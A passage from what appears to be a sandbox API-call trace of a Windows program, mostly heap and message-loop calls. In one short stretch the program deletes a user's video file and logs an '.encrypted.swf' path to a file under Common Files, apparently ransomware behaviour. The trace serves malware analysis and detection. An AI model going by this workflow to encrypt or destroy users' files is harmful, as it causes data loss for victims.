lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.776] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0042.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.777] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.777] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\urm8i1sk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.777] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.778] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.778] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.778] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.778] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.779] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.779] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.779] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.779] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFilePart=0x0) returned 0x31 [0042.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x1933fec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0x7c2100 [0042.779] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\urm8i1sk.swf")) returned 1 [0042.780] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x1933fec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0 [0042.780] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.780] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.782] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.782] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.782] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.783] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.783] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.783] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.783] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.783] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.784] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.784] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.784] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.784] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.785] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.785] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3564, lpOverlapped=0x0) returned 1 [0042.785] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.785] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3564, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.785] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.encrypted.swf\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0042.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab380 [0042.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.encrypted.swf\r\n", cchWideChar=62, lpMultiByteStr=0x7ab380, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 62 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.786] WriteFile (in: hFile=0x140, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3d, lpOverlapped=0x0) returned 1 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.786] CloseHandle (hObject=0x140) returned 1 [0042.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.788] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.788] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, 